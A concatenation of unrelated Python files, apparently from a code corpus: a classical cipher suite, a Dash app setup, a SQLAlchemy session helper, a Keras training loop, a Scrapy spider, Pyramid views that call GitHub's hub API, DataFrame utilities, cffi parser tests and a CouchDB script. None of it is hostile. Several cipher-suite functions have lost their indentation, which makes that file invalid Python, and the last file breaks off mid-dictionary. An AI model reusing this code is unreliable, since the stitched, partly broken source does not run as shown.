def caesar_transform(operation, str):
    """Dispatch to the Caesar encrypt or decrypt routine.

    operation: 'E' encrypts; any other value decrypts.
    Returns the transformed string.
    """
    return encrypt_caesar(str) if operation == 'E' else decrypt_caesar(str)
def encrypt_vigenere(plaintext, keyword):
    """Encrypt upper-case *plaintext* with a Vigenere cipher keyed by *keyword*.

    Each letter is shifted forward by the corresponding (cycled) keyword
    letter's offset from 'A', wrapping past 'Z'. Both arguments are
    expected to be upper-case A-Z only.
    Returns the encrypted string.
    """
    encrypted = []
    for position, letter in enumerate(plaintext):
        shift = ord(keyword[position % len(keyword)]) - ord('A')
        code = ord(letter) + shift
        if code > ord('Z'):
            code -= 26
        encrypted.append(chr(code))
    return ''.join(encrypted)
def decrypt_vigenere(ciphertext, keyword):
    """Decrypt a Vigenere ciphertext produced with *keyword*.

    Each letter is shifted backward by the corresponding (cycled) keyword
    letter's offset from 'A', wrapping before 'A'. Both arguments are
    expected to be upper-case A-Z only.
    Returns the decrypted string.
    """
    decrypted = []
    for position, letter in enumerate(ciphertext):
        shift = ord(keyword[position % len(keyword)]) - ord('A')
        code = ord(letter) - shift
        if code < ord('A'):
            code += 26
        decrypted.append(chr(code))
    return ''.join(decrypted)
def vigenere_transform(operation, str):
"""Prompt for a passkey, then Vigenere-encrypt or -decrypt *str*.

operation: 'E' encrypts; any other value decrypts.
The key is read from stdin and upper-cased. Progress messages are
printed to stdout. Returns the transformed string.
(The parameter name shadows the builtin str; kept for compatibility.)
"""
key = input("Passkey? ").upper()
if operation == 'E':
print("Encrypting {0} using Vigenere cipher with key {1}".format(str, key))
print("...")
return encrypt_vigenere(str, key)
else:
print("Decrypting {0} using Vigenere cipher with key {1}".format(str, key))
print("...")
return decrypt_vigenere(str, key)
def encrypt_railfence(plaintext, num_rails):
    """Encrypt *plaintext* with a rail-fence (zigzag) cipher.

    Characters are written down-and-up across num_rails rows, then the
    rows are concatenated top to bottom. One rail is the identity.
    Returns the encrypted string.
    """
    if num_rails == 1:
        return plaintext
    rails = [[] for _ in range(num_rails)]
    row, step = 0, 1
    for ch in plaintext:
        rails[row].append(ch)
        # Reverse direction at the top and bottom rails.
        if row == 0:
            step = 1
        elif row == num_rails - 1:
            step = -1
        row += step
    return ''.join(''.join(rail) for rail in rails)
def slice_ciphertext(ciphertext, num_rails):
    """Split *ciphertext* into the per-rail segments of a rail-fence grid.

    Returns a list of num_rails strings; the i-th string holds exactly the
    characters that the zigzag writes onto rail i.

    Bug fix: the original computed middle-rail lengths arithmetically and
    missed the second visit of a middle rail inside a partial final cycle
    (observable for num_rails >= 4), which desynchronized decryption.
    Lengths are now derived by simulating the zigzag walk, which is
    correct for any message length and rail count (including 1 rail,
    which previously divided by zero).
    """
    # Count how many characters land on each rail by walking the zigzag.
    counts = [0] * num_rails
    row, step = 0, 1
    for _ in range(len(ciphertext)):
        counts[row] += 1
        if row == 0:
            step = 1
        elif row == max(num_rails - 1, 0):
            step = -1
        row += step if num_rails > 1 else 0
    # Slice consecutive runs of those lengths off the ciphertext.
    pieces = []
    start = 0
    for row_len in counts:
        pieces.append(ciphertext[start:start + row_len])
        start += row_len
    return pieces
def decrypt_railfence(ciphertext, num_rails):
    """Decrypt a rail-fence cipher produced by encrypt_railfence.

    Splits the ciphertext back into its rails, then replays the zigzag
    walk, consuming the next unused character of whichever rail the walk
    visits. Returns the decrypted string.
    """
    if num_rails == 1:
        return ciphertext
    rails = slice_ciphertext(ciphertext, num_rails)
    cursors = [0] * num_rails  # next unread index within each rail
    decrypted = []
    row, step = 0, 1
    for _ in range(len(ciphertext)):
        decrypted.append(rails[row][cursors[row]])
        cursors[row] += 1
        if row == 0:
            step = 1
        elif row == num_rails - 1:
            step = -1
        row += step
    return ''.join(decrypted)
def railfence_transform(operation, str):
"""Prompt for a rail count, then rail-fence encrypt or decrypt *str*.

operation: 'E' encrypts; any other value decrypts.
The number of rails is read from stdin; progress messages are
printed to stdout. Returns the transformed string.
(The parameter name shadows the builtin str; kept for compatibility.)
"""
num_rails = int(input("Rails: "))
if operation == 'E':
print("Encrypting {0} using Railfence cipher with num_rails {1}".format(str, num_rails))
print("...")
return encrypt_railfence(str, num_rails)
else:
print("Decrypting {0} using Railfence cipher with num_rails {1}".format(str, num_rails))
print("...")
return decrypt_railfence(str, num_rails)
def read_from_file(filename):
    """Return the entire contents of *filename* as a single string."""
    with open(filename, 'r') as source:
        return source.read()
def write_to_file(filename, content):
    """Write *content* to *filename*, replacing any existing contents."""
    with open(filename, 'w') as sink:
        sink.write(content)
def get_input():
"""Ask the user for input text, from the console or from a file.

Prompts F/S until a valid choice is given; 'S' reads a line from
stdin, 'F' reads a whole file via read_from_file.
Returns the text upper-cased.
"""
choice = input("(F)ile or (S)tring? ").upper()
while not choice or choice[0] not in ['F', 'S']:
choice = input("Please enter either 'F' or 'S'. Again (F/S)? ").upper()
if choice[0] == 'S':
input_str = input("Enter the string to encrypt/decrypt: ")
else:
filename = input("Filename: ")
input_str = read_from_file(filename)
return input_str.upper()
def strip(str):
    """Return *str* with every non-alphabetic character removed.

    (The parameter name shadows the builtin str; kept so existing
    callers are unaffected.)
    """
    return ''.join(filter(lambda ch: ch.isalpha(), str))
def transform(str):
"""Ask for operation and cipher, then transform *str* accordingly.

Prompts E/D and C/V/R until valid answers are given, then dispatches
to the chosen cipher's *_transform helper.
Returns (operation, transformed_string).
(The parameter name shadows the builtin str; kept for compatibility.)
"""
operation = input("(E)ncrypt or (D)ecrypt? ").upper()
while not operation or operation not in ['E', 'D']:
operation = input("Please enter either 'E' or 'D'. Again (E/D)? ").upper()
cipher = input("(C)aesar, (V)igenere, or (R)ailfence? ").upper()
while not cipher or cipher not in ['C', 'V', 'R']:
cipher = input("Please enter either 'C', 'V' or 'R'. Again (C/V/R)? ").upper()
if cipher == 'C':
return operation, caesar_transform(operation, str)
elif cipher == 'V':
return operation, vigenere_transform(operation, str)
elif cipher == 'R':
return operation, railfence_transform(operation, str)
def output(operation, transformed):
"""Show the result on screen or write it to a user-chosen file.

operation: 'E' or 'D', used only to word the message ("ciphertext"
vs "plaintext"). Prompts F/S until a valid choice is given.
"""
output_option = input("(F)ile or (S)tring ").upper()
while not output_option or output_option not in ['F', 'S']:
output_option = input("Please enter either 'F' or 'S'. Again (F/S)? ").upper()
if (output_option == 'S'):
if (operation == 'E'):
print("The ciphertext is: {0}".format(transformed))
else:
print("The plaintext is: {0}".format(transformed))
else:
output_file = input("Filename? ")
if (operation == 'E'):
print("Writing ciphertext to {0}...".format(output_file))
else:
print("Writing plaintext to {0}...".format(output_file))
write_to_file(output_file, transformed)
def run_suite():
"""
Runs a single iteration of the cryptography suite.
Asks the user for input text from a string or file, whether to encrypt
or decrypt, what tool to use, and where to show the output.
Non-alphabetic characters are stripped before transforming, since the
cipher tables only cover A-Z/a-z.
"""
print("*Input*")
input_str = get_input()
stripped = strip(input_str)
print("*Transform*")
operation, transformed = transform(stripped)
print("*Output*")
output(operation, transformed)
# Do not modify code beneath this point.
def should_continue():
"""
Asks the user whether they would like to continue.
Responses that begin with a `Y` return True. (case-insensitively)
Responses that begin with a `N` return False. (case-insensitively)
All other responses (including '') cause a reprompt.
"""
choice = input("Again (Y/N)? ").upper()
while not choice or choice[0] not in ['Y', 'N']:
choice = input("Please enter either 'Y' or 'N'. Again (Y/N)? ").upper()
return choice[0] == 'Y'
def main():
"""Harness for the Cryptography Suite: loop run_suite until the user quits."""
print("Welcome to the Cryptography Suite!")
run_suite()
while should_continue():
run_suite()
print("Goodbye!")
if __name__ == '__main__':
"""This block is run if and only if the Python script is invoked from the
command line."""
main()
|
def handleCommand():
    """Return the bot's author credits and repository link."""
    authors = 'Authors:Arvid Granroth & Benjamin Tellström \n'
    repo = 'Github Repo:https://github.com/Arrezz/SkivirBotPy'
    return authors + repo
|
19,221 | c3cfbec282736026e41ac33a53e2dafde2df4f53 | import dash
# External CSS: the common Codepen base stylesheet plus the Dash
# drug-discovery demo theme.
external_stylesheets = [
'https://codepen.io/chriddyp/pen/bWLwgP.css',
'https://cdn.rawgit.com/plotly/dash-app-stylesheets/0e463810ed36927caf20372b6411690692f94819/dash-drug-discovery-demo-stylesheet.css'
]
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
# Underlying Flask server, exposed for WSGI deployment.
server = app.server
# Allow callbacks that reference component ids added to the layout later.
app.config.suppress_callback_exceptions = True
# Default the QCPortal endpoint to None — presumably overridden by
# deployment configuration elsewhere; confirm.
app.server.config.from_mapping(QCPORTAL_URI=None)
|
19,222 | 583f8cc59475d49ab903c601969e142073cea479 | from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.pool import StaticPool
# The global database session.
session = None
def init_session(connection_string=None, drop=False):
    """Initialize the database session and create the schema if it
    does not exist.

    The connection string describes the database connection.
    Documentation on this can be found on [1]. If it is omitted
    a temporary in-memory sqlite database will be used. This
    is useful for unittesting where you need a fresh database
    on every run.

    The schema can also be dropped before initialization by
    setting the drop parameter to true.

    The session can be accessed through the module-level `session`
    variable of the database module after this call.

    [1] http://docs.sqlalchemy.org/en/rel_0_8/core/engines.html

    :param connection_string: The connection description for the
                              engine. See above for details.
    :param drop: Drop the schema and recreate it in init. All
                 data will be lost!
    """
    if connection_string is None:
        # In-memory SQLite usable from multiple threads: StaticPool keeps a
        # single connection alive so every session sees the same database.
        engine = create_engine('sqlite://',
                               echo=False,
                               connect_args={'check_same_thread': False},
                               poolclass=StaticPool)
    else:
        engine = create_engine(connection_string)
    # Imported here, presumably to avoid a circular import at module load.
    from database.model import Base
    global session
    if drop:
        # Best-effort drop of the previous schema: on the first call
        # `session` is still None, so this simply falls through.
        try:
            old_session = session
            Base.metadata.drop_all(bind=old_session.bind)
        except Exception:
            # Fix: the original used a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; narrowed while keeping the
            # deliberate best-effort semantics.
            pass
    db_session = scoped_session(sessionmaker(autocommit=False,
                                             autoflush=False,
                                             bind=engine))
    Base.metadata.create_all(bind=engine)
    session = db_session
|
19,223 | 349f042f3209106501fc2d7186b96d5df0da41bd | import keras
import json
import numpy as np
import util.emnist as emnist
import util.data as data_util
import util.model as model_util
import results.results as results_util
"""
We pretend sorted model is doing it in tasks so we can compare it
to the models who are using tasks
"""
model_ids = [0, 1, 2]
task_counts_to_compare_to = [5, 10, 25]
epochs = 3
batch_size = 128
balanced_set = emnist.sets['balanced']
validation_split = 0.2

# Indices into the list returned by model.evaluate().
# Could probably do some stuff with model.metric_names if needs be:
# https://stackoverflow.com/questions/51299836/what-values-are-returned-from-model-evaluate-in-keras
loss_index = 0
categorial_accuracy_index = 1
top_2_accuracy_index = 2

filepath = './models/untrained'

# For every (task_count, model) combination, train the model on the
# mean-sorted data split into pseudo-tasks and record metrics per task.
for task_count in task_counts_to_compare_to:
    for model_id in model_ids:
        results = []
        samples_seen = 0

        # Load a fresh, untrained copy of this model.
        model = model_util.load('model_{0}'.format(model_id), filepath)

        # Reload and re-process the data (including re-sorting) each cycle
        # so earlier runs cannot contaminate later ones.
        data, classes = emnist.get(balanced_set)
        x, y, val_x, val_y = data_util.validation_split(
            data['x'], data['y'], validation_split)
        x, y = emnist.mean_sort(x, y, classes, task_count)

        # Convert data into the shape the model expects.
        x, y = data_util.prep(x, y, classes)
        val_x, val_y = data_util.prep(val_x, val_y, classes)
        test_x, test_y = data_util.prep(data['test_x'], data['test_y'], classes)

        # Chunk the sorted stream into pseudo-tasks for comparison's sake.
        tasks_x = data_util.chunk(x, task_count)
        tasks_y = data_util.chunk(y, task_count)

        for epoch in range(epochs):
            for task_index in range(task_count):
                # Train on this task, then evaluate on the held-out test set.
                model.fit(
                    x=tasks_x[task_index],
                    y=tasks_y[task_index],
                    batch_size=batch_size,
                    epochs=1,
                    validation_data=(val_x, val_y)
                )
                score = model.evaluate(
                    x=test_x,
                    y=test_y,
                    batch_size=128
                )
                samples_seen += len(tasks_x[task_index])
                results.append({
                    # NOTE(review): key spelling "samples_seens" kept as-is
                    # for downstream readers of the saved results.
                    "samples_seens": samples_seen,
                    "categorial_accuracy": score[categorial_accuracy_index],
                    "top_2_accuracy": score[top_2_accuracy_index],
                    "loss": score[loss_index],
                    "epoch": epoch,
                    "task": task_index,
                })

        # Done with this model: persist the collected metrics.
        name = "id{0}_t{1}_sorted".format(model_id, task_count)
        results_util.save('./results/data', name, {
            "name": name,
            "id": model_id,
            "task_count": task_count,
            "results": results
        })
|
19,224 | 3685b3aa3f6a8c0d2278a728c8dd4c35b095da3b | from scrapy_splash import SplashRequest
from scrapy import Spider
from .. import selector_paths
from ..items import Boardgame
BASE_URI = "https://boardgamegeek.com"
LIST_URL = BASE_URI + "/browse/boardgame"
CREDITS_URI = '/credits'
class BGGSpider(Spider):
    """Crawl BoardGameGeek's browse listing and scrape per-game details."""

    name = 'bgg_spider'
    allowed_domains = ['boardgamegeek.com']
    start_urls = [
        LIST_URL
    ]

    def parse(self, response):
        """Parse one listing page: yield a SplashRequest per game row,
        then follow the pagination link."""
        for row_ in response.xpath('.//tr[@id="row_"]'):
            bg = Boardgame()
            bg['title'] = row_.xpath(
                selector_paths.SEL_TITLE).extract_first()
            bg['geek_rating'], bg['avg_rating'], bg['votes'] = [
                x for x in row_.xpath(selector_paths.SEL_METRICS).extract()]
            if 'N/A' in bg['geek_rating'] and 'N/A' in bg['avg_rating']:
                # Fix: the old code did a bare `yield` (emitting None) and
                # then fell through and scraped the game anyway; skip it.
                print('INFO: Not enough information dropping BG.')
                continue
            bg_link = BASE_URI + row_.xpath(
                selector_paths.SEL_LINK).extract_first()
            # Link shape: /boardgame/<id>/<slug> -> id is path segment 4.
            bg['bg_id'] = bg_link.split('/')[4]
            yield SplashRequest(
                url=bg_link,
                callback=self.parse_boardgame,
                endpoint='render.html',
                meta={'bg': bg, 'bg_link': bg_link},
                args={'wait': 4}
            )
        next_page = response.xpath(selector_paths.SEL_NEXT_PG).extract_first()
        next_page_url = response.urljoin(next_page)
        yield SplashRequest(
            url=next_page_url,
            callback=self.parse
        )

    def parse_boardgame(self, response):
        """Parse a Splash-rendered game page and fill in the item."""
        bg = response.meta['bg']
        # bg_link = response.meta['bg_link']
        # get min/max players
        bg['min_players'] = response.xpath(
            selector_paths.SEL_MIN_PLAYERS).extract_first()
        bg['max_players'] = response.xpath(
            selector_paths.SEL_MAX_PLAYERS).extract_first()
        # check for min/max time
        bg['time'] = response.xpath(
            selector_paths.SEL_MAX_TIME).extract_first()
        if bg['time'] is None:  # no max time, get min.
            bg['time'] = response.xpath(
                selector_paths.SEL_MIN_TIME).extract_first()
        bg['weight'] = response.xpath(
            selector_paths.SEL_WEIGHT).extract_first()
        bg['min_age'] = response.xpath(
            selector_paths.SEL_MIN_AGE).extract_first()
        # some pages do not contain reviews, do some exception work.
        bg['txt_cnt'] = response.xpath(
            selector_paths.SEL_TXT_REVIEWS).extract_first()
        bg['vid_cnt'] = response.xpath(
            selector_paths.SEL_VID_REVIEWS).extract_first()
        # credits_link = bg_link + CREDITS_URI
        bg['mechanisms'] = set(
            response.xpath(selector_paths.SEL_MECHANISMS_ALT).extract())
        # yield SplashRequest(
        #     credits_link,
        #     callback=self.parse_credits,
        #     meta={'bg': bg}
        # )
        yield bg

    def parse_credits(self, response):
        """Parse the /credits page for mechanisms (currently not scheduled)."""
        bg = response.meta['bg']
        bg['mechanisms'] = set(
            response.xpath(selector_paths.SEL_MECHANISMS).extract())
        if not bg['mechanisms']:
            # Fall back to the old markup. Fixes two defects: the previous
            # check `'mechanisms' not in bg` was always False right after the
            # assignment above, and the selector constant was misspelled
            # SEL_MECHANISIMS_ALT (SEL_MECHANISMS_ALT is what parse_boardgame
            # uses).
            bg['mechanisms'] = set(
                response.xpath(selector_paths.SEL_MECHANISMS_ALT).extract())
        yield bg
|
19,225 | 5f40161c258f1be733caf7b48cb37b1a49925573 | # -*- coding: utf-8 -*-
from django.http import JsonResponse
def result(object):
    """Wrap *object* in the API's standard success envelope as JSON."""
    payload = {
        'result': True,
        'message': 'success',
        'data': object,
    }
    return JsonResponse(payload)
|
19,226 | b2aed62abe0830c77bdeb16eaa2b9b040b69607f |
# 4x4 cake; every cell weighs 1.
cake = [[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]]
for row in range(4):
    print(cake[row])

N = 4
result = 2

# Try every interior cut point (x, y).  The horizontal and vertical cuts
# split the cake into four rectangles; result becomes 1 if some cut yields
# four quarters of equal total weight.
for y in range(1, N):
    for x in range(1, N):
        # Quarter 1: top-left.
        a = sum(cake[yy][xx] for yy in range(y) for xx in range(x))
        # Quarter 2: bottom-left.
        b = sum(cake[yy][xx] for yy in range(y, N) for xx in range(x))
        # Quarter 3: top-right.
        c = sum(cake[yy][xx] for yy in range(y) for xx in range(x, N))
        # Quarter 4: bottom-right.
        d = sum(cake[yy][xx] for yy in range(y, N) for xx in range(x, N))
        if a == b == c == d:
            result = 1
            print(a, b, c, d)

print(result)
19,227 | 4a2b7ece75471ec1d6bfecf148ea826ce3781f45 | # Class to represent an argument on the command line
# Can be user for both required arguments as well as values for optional arguments
class Argument(object):
    """An argument on the command line.

    Can be used both for required arguments and for values of optional
    arguments.
    """

    def __init__(self, name=None):
        # Display/lookup name of the argument; None when unnamed.
        self.name = name

    @classmethod
    def build(cls, argument_dict):
        """Create an argument from a dict with an optional 'name' key.

        Fix: returns ``cls(...)`` instead of a hard-coded ``Argument(...)``
        so subclasses build instances of themselves.
        """
        return cls(name=argument_dict.get('name'))
|
19,228 | b0228dd7e8285ba8a67e426343044ddce16f67a0 | import unittest
from cffi import FFI
from test_functions import *
class TestCompoundList(unittest.TestCase):
    """Exercises the C `read_compound_list` parser through a cffi binding.

    The shared library is loaded from ../build/libmy42sh.so and its C
    declarations are gathered from the headers under ../src/includes.
    """

    def __init__(self, arg):
        unittest.TestCase.__init__(self, arg)
        self.ffi = FFI()
        # Load the shell parser library and register its declarations.
        self.lib = self.ffi.dlopen("../build/libmy42sh.so")
        source = get_source_all_files("../src/includes")
        self.ffi.cdef(source)

    def init_and_process_lexer(self, command):
        # Helper: build a lexer over `command` (bytes) and run it fully.
        clexer = self.lib.lexer_init(command)
        self.lib.lexer_process(clexer)
        return clexer

    def test_01_simple_or(self):
        # `a || b` must parse as a compound list.
        node = self.lib.init_ast_node()
        self.assertTrue(
            self.lib.read_compound_list(
                node,
                self.init_and_process_lexer(b'myword || myword')))

    def test_02_ending_semi(self):
        # A trailing semicolon is accepted.
        node = self.lib.init_ast_node()
        self.assertTrue(
            self.lib.read_compound_list(
                node,
                self.init_and_process_lexer(b'myword || myword;')))

    def test_03_and_plus_or(self):
        # Mixing `||` and a background `&` separator.
        node = self.lib.init_ast_node()
        self.assertTrue(
            self.lib.read_compound_list(
                node,
                self.init_and_process_lexer(b'myword || myword & myword')))

    def test_04_with_newlines(self):
        # Newlines act as list separators inside a compound list.
        node = self.lib.init_ast_node()
        self.assertTrue(
            self.lib.read_compound_list(
                node,
                self.init_and_process_lexer(b'myword || myword \n myword')))

    def test_05_simple_word(self):
        # A single word is the degenerate compound list.
        node = self.lib.init_ast_node()
        self.assertTrue(
            self.lib.read_compound_list(
                node,
                self.init_and_process_lexer(b'myword')))

    def test_06_or_node_attributes(self):
        # `word1; word2` must build LIST_SEMI -> LIST_NONE chained list
        # nodes, each wrapping a simple command with the expected word.
        node = self.lib.init_ast_node()
        self.lib.read_compound_list(node, self.init_and_process_lexer(b'word1; word2'))
        list_node_1 = node.data.s_list_node
        and_or_1 = list_node_1.left.data.s_and_or_node
        command_1 = and_or_1.left.data.s_pipeline_node.commands[0].data \
            .s_command_node.content.data.s_simple_command_node
        self.assertEqual(list_node_1.type, self.lib.LIST_SEMI)
        self.assertEqual(self.ffi.string(command_1.elements[0].data.s_word.value), b'word1')
        list_node_2 = list_node_1.right.data.s_list_node
        and_or_2 = list_node_2.left.data.s_and_or_node
        command_2 = and_or_2.left.data.s_pipeline_node.commands[0].data \
            .s_command_node.content.data.s_simple_command_node
        self.assertEqual(list_node_2.type, self.lib.LIST_NONE)
        self.assertEqual(self.ffi.string(command_2.elements[0].data.s_word.value), b'word2')

    def test_07_and_node_attributes(self):
        # Same structural check for `word1 & word2` (LIST_AND separator).
        node = self.lib.init_ast_node()
        self.lib.read_compound_list(node, self.init_and_process_lexer(b'word1 & word2'))
        list_node_1 = node.data.s_list_node
        and_or_1 = list_node_1.left.data.s_and_or_node
        command_1 = and_or_1.left.data.s_pipeline_node.commands[0].data \
            .s_command_node.content.data.s_simple_command_node
        self.assertEqual(list_node_1.type, self.lib.LIST_AND)
        self.assertEqual(self.ffi.string(command_1.elements[0].data.s_word.value), b'word1')
        list_node_2 = list_node_1.right.data.s_list_node
        and_or_2 = list_node_2.left.data.s_and_or_node
        command_2 = and_or_2.left.data.s_pipeline_node.commands[0].data \
            .s_command_node.content.data.s_simple_command_node
        self.assertEqual(list_node_2.type, self.lib.LIST_NONE)
        self.assertEqual(self.ffi.string(command_2.elements[0].data.s_word.value), b'word2')
|
19,229 | ed8ddce220d628c4b5a259b937b3d6881f67f108 | from pyramid.view import view_config
from pyramid.security import authenticated_userid
from pyramid.httpexceptions import HTTPFound
import statatat.models as m
from statatat.widgets.graph import make_chart
import requests
# http://developer.github.com/v3/repos/hooks/
# GitHub pubsubhubbub endpoint (see http://developer.github.com/v3/repos/hooks/).
github_api_url = "https://api.github.com/hub"
# Event topics we (un)subscribe to; only pushes are enabled for now.
github_events = [
    "push",
    #"issues",
    #"issue_comment",
    #"pull_request",
    #"gollum",
    #"watch",
    #"download",
    #"fork",
    #"fork_apply",
    #"member",
    #"public",
    #"status",
]
@view_config(route_name='new_key')
def new_key(request):
    """Create a new source key for the logged-in user, then redirect to
    the user's page. Anonymous requests are bounced to '/'."""
    username = authenticated_userid(request)
    if not username:
        # TODO -- raise the right status code
        return HTTPFound("/")
    user = m.User.query.filter_by(username=username).one()
    key = m.SourceKey(notes=request.POST.get('notes'))
    m.DBSession.add(key)
    user.source_keys.append(key)
    return HTTPFound(location="/" + username)
@view_config(route_name='home', renderer='index.mak')
def home(request):
    """Render the index page with the live-updating chart widget."""
    settings = request.registry.settings
    return {
        'chart': make_chart(settings['moksha.livesocket.backend']),
    }
@view_config(name='toggle', context=m.Repo, renderer='json')
def repo_toggle_enabled(request):
    """Flip webhook delivery for the repo in context and (un)subscribe to
    its GitHub events via pubsubhubbub. Returns a JSON status payload."""
    repo = request.context
    repo.enabled = not repo.enabled
    data = {
        "access_token": request.session['token'],
        # 'subscribe' when enabling, 'unsubscribe' when disabling.
        "hub.mode": ['unsubscribe', 'subscribe'][repo.enabled],
        # TODO -- use our own callback and not requestb.in
        # ... think over the best pattern for traversal first.
        "hub.callback": "http://statatat.ws/webhooks/github",
    }
    for event in github_events:
        data["hub.topic"] = "https://github.com/%s/%s/events/%s" % (
            repo.user.username, repo.name, event)
        # Subscribe to events via pubsubhubbub
        result = requests.post(github_api_url, data=data)
        # TODO -- handle errors more gracefully.
        # NOTE(review): `assert` is stripped under `python -O`; replace with
        # an explicit status check when the error handling is written.
        assert(result.status_code == 204)
    return {
        'status': 'ok',
        'enabled': request.context.enabled,
        'repo': request.context.__json__(),
    }
@view_config(name='revoke', context=m.SourceKey, renderer='json')
def source_key_revoke(request):
    """Mark the source key addressed by the request as revoked and
    return its JSON representation."""
    request.context.revoked = True
    return request.context.__json__()
@view_config(route_name='docs', renderer='docs.mak')
def docs(request):
    """Render the static documentation page; no template context needed."""
    return {}
|
19,230 | 1fe1dec96ca1567ecf314a080b2b20f27a15aad3 | # -*- coding: utf-8 -*-
from hagworm.extend.struct import Configure
class _Static(Configure):
    """Static (restart-required) configuration: database and cache servers."""

    def _init_options(self):

        ##################################################
        # MySQL database
        self.MySqlMasterServer = self._parser.get_split_host(r'MySql', r'MySqlMasterServer')
        self.MySqlSlaveServer = self._parser.get_split_host(r'MySql', r'MySqlSlaveServer')

        self.MySqlName = self._parser.get(r'MySql', r'MySqlName')
        self.MySqlUser = self._parser.get(r'MySql', r'MySqlUser')
        self.MySqlPasswd = self._parser.get(r'MySql', r'MySqlPasswd')

        # Connection-pool bounds for master and slave.
        self.MySqlMasterMinConn = self._parser.getint(r'MySql', r'MySqlMasterMinConn')
        self.MySqlMasterMaxConn = self._parser.getint(r'MySql', r'MySqlMasterMaxConn')
        self.MySqlSlaveMinConn = self._parser.getint(r'MySql', r'MySqlSlaveMinConn')
        self.MySqlSlaveMaxConn = self._parser.getint(r'MySql', r'MySqlSlaveMaxConn')

        ##################################################
        # MongoDB database
        self.MongoHost = self._parser.get_split_str(r'Mongo', r'MongoHost')

        self.MongoName = self._parser.get(r'Mongo', r'MongoName')
        self.MongoUser = self._parser.get(r'Mongo', r'MongoUser')
        self.MongoPasswd = self._parser.get(r'Mongo', r'MongoPasswd')

        self.MongoMinConn = self._parser.getint(r'Mongo', r'MongoMinConn')
        self.MongoMaxConn = self._parser.getint(r'Mongo', r'MongoMaxConn')

        ##################################################
        # Cache (Redis)
        self.RedisHost = self._parser.get_split_host(r'Redis', r'RedisHost')

        self.RedisBase = self._parser.getint(r'Redis', r'RedisBase')
        # NOTE(review): uses `getstr` while the other string options use
        # `get` — confirm hagworm's parser actually provides getstr.
        self.RedisPasswd = self._parser.getstr(r'Redis', r'RedisPasswd')

        self.RedisMinConn = self._parser.getint(r'Redis', r'RedisMinConn')
        self.RedisMaxConn = self._parser.getint(r'Redis', r'RedisMaxConn')

        self.RedisExpire = self._parser.getint(r'Redis', r'RedisExpire')
        self.RedisKeyPrefix = self._parser.get(r'Redis', r'RedisKeyPrefix')

        ##################################################
class _Dynamic(Configure):
    """Dynamic (reloadable) configuration: server, logging and worker pools."""

    def _init_options(self):

        ##################################################
        # Basics
        self.Port = self._parser.getint(r'Base', r'Port')
        self.Debug = self._parser.getboolean(r'Base', r'Debug')
        self.GZip = self._parser.getboolean(r'Base', r'GZip')
        self.Secret = self._parser.get(r'Base', r'Secret')
        self.ProcessNum = self._parser.getint(r'Base', r'ProcessNum')

        ##################################################
        # Logging
        self.LogLevel = self._parser.get(r'Log', r'LogLevel')
        self.LogFilePath = self._parser.get(r'Log', r'LogFilePath')
        self.LogFileSplitSize = self._parser.getint(r'Log', r'LogFileSplitSize')
        self.LogFileSplitTime = self._parser.get(r'Log', r'LogFileSplitTime')
        self.LogFileBackups = self._parser.getint(r'Log', r'LogFileBackups')

        ##################################################
        # Thread / process pools
        self.ThreadPoolMaxWorkers = self._parser.getint(r'Pool', r'ThreadPoolMaxWorkers')
        self.ProcessPoolMaxWorkers = self._parser.getint(r'Pool', r'ProcessPoolMaxWorkers')

        ##################################################
# Module-level singletons, parsed once at import time.
ConfigStatic = _Static()
ConfigDynamic = _Dynamic()
|
19,231 | 27c3871b192c088d6c2a2bcf1af6471a05f9ed78 | """Utilities for DataFrames"""
import pandas as pd
import numpy as np
def isLessEqual(df1, df2):
    """
    Tests if each value in df1 is less than or equal the
    corresponding value in df2.

    Only rows whose index appears in both frames are compared; the two
    frames are assumed to share the same columns.

    :param pd.DataFrame df1:
    :param pd.DataFrame df2:
    :return bool:
    """
    shared = list(set(df1.index).intersection(df2.index))
    diff = df1.loc[shared, :] - df2.loc[shared, :]
    # Vectorized comparison replaces the deprecated DataFrame.applymap
    # plus the count-based sum()/size equality check; NaN differences
    # compare False, matching the old behavior.
    return bool((diff <= 0).all().all())
def mean(dfs):
    """
    Calculates the mean of values in a list of dataframes
    for the same index, column.

    :param list-pd.DataFrame dfs:
    :return pd.DataFrame:
    """
    total = sum(dfs)
    return total / len(dfs)
def std(dfs):
    """
    Calculates the (population) standard deviation of values in a
    list of dataframes for the same index, column.

    Bug fix: the previous implementation returned the mean squared
    deviation (the variance) despite its name and docstring; the
    square root is now applied.

    :param list-pd.DataFrame dfs:
    :return pd.DataFrame:
    """
    # Element-wise mean (inlined so this function is self-contained).
    df_mean = sum(dfs) / len(dfs)
    df_var = sum((df - df_mean) * (df - df_mean) for df in dfs) / len(dfs)
    return df_var ** 0.5
def subset(df, items, axis=1):
    """
    Constructs a dataframe that is a subset to the items, by row or column.

    Parameters
    ----------
    df: pd.DataFrame
    items: list
        columns if axis = 1; indices if axis = 0
    axis: int
        0 - rows
        1 - columns

    Returns
    -------
    pd.DataFrame

    Raises
    ------
    ValueError
        If axis is neither 0 nor 1.
    """
    wanted = set(items)
    if axis == 1:
        return df[list(wanted.intersection(df.columns))]
    if axis == 0:
        return df.loc[list(wanted.intersection(df.index)), :]
    raise ValueError("Invalid axis: %d" % axis)
|
19,232 | 043d0e823edc1e819d38504ca39d3a5c508ddbad | import couchdb
# NOTE(review): Python 2 script (uses raw_input); connects to a local CouchDB.
couch = couchdb.Server()
#x = raw_input('enter the url\n')
#print x
#del couch[x]
#db = couch.create(x) # newly created
#db = couch['test1'] # existing
# Prompt for a document id (the visited URL) and its payload.
visited = raw_input('enter url')
data = raw_input('enter the data')
#try:
# Create the 'issc' database and store one document keyed by the URL.
db = couch.create('issc')
doc_id1, doc_rev1 = db.save({'_id':visited,'link':data})
# doc_id2, doc_rev2 = db.save({'_id':'unvisited','link':[]})
#except Exception:
# db = server['test']
#doc1 = {"text": "Sandeep","rating": 113} #To insert new record
#db.save(doc1) #To save document
#for id in db:
# print id
#s=db.get('text')
#print s
19,233 | bee7b44df6a829106a54e47379601768ae930121 | """Collections of tasks.
Copied from https://github.com/gyyang/multitask."""
from __future__ import division
import six
import numpy as np
# all rules
rules_dict = \
{'all' : ['fdgo', 'reactgo', 'delaygo', 'fdanti', 'reactanti', 'delayanti',
'dm1', 'dm2', 'contextdm1', 'contextdm2', 'multidm',
